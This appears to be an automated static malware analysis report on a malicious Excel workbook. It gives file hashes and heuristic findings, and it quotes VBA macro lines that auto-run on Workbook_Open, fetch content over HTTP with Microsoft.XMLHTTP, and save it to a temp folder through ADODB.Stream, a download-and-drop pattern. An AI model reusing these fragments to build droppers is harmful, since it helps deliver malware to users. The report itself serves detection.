Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ca4dcdff941bbb59…

MALICIOUS

Office (OOXML)

Size: 6.98 MB
Created: 2018-07-24 19:22:46 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-06-28
MD5: 02794c6752cee7958fbbb0fdf8cec498
SHA-1: 50c1f686a4cb25c5c31d413e4481007cf2531ebe
SHA-256: ca4dcdff941bbb591c85fff32d162646971774333346cb775a9a94879066d2a8
Risk Score: 196

Heuristics (10)

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    oStream.Type = 1
    oStream.Write WinHttpReq.responseBody
    oStream.SaveToFile targetFileXLSX, 2 ' 1 = no overwrite, 2 = overwrite
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
    WinHttpReq.Open "GET", URL, False
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Workbook_Open()
    SplashScreen.Show
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    targetFolder = VBA.Environ("TEMP") & "\" & RandomString(6) & "\"
    MkDir targetFolder
  • External hyperlinks (3) low OOXML_EXTERNAL_HYPERLINKS
    Document contains 3 external hyperlinks — clickable URLs are stored as external relationships. First target: https://www.coinbase.com/join/5a4c053c2ed86105b1bac21a?src=ios-link
  • Hidden worksheet (veryHidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 3 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Large OOXML part skipped info SCAN_INCOMPLETE
    One or more high-value OOXML parts exceeded the scanner's per-entry size cap and may not have been fully inspected.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.imagemagick.org — Referenced by macro
    • https://etoro.tw/2L4Kwq3 — Referenced by macro
    • http://www.w3.org/2000/svg — Referenced by macro
    • http://www.w3.org/1999/xlink — Referenced by macro
    • http://schemas.microsoft.com/office/2006/01/customui — Referenced by macro
    • https://en.wikipedia.org/wiki/File:ATP_World_Tour.png — Referenced by macro
    • https://www.coinbase.com/join/5a4c053c2ed86105b1bac21a?src=ios-link — Referenced by macro
    • https://www.binance.com/?ref=18552868 — Referenced by macro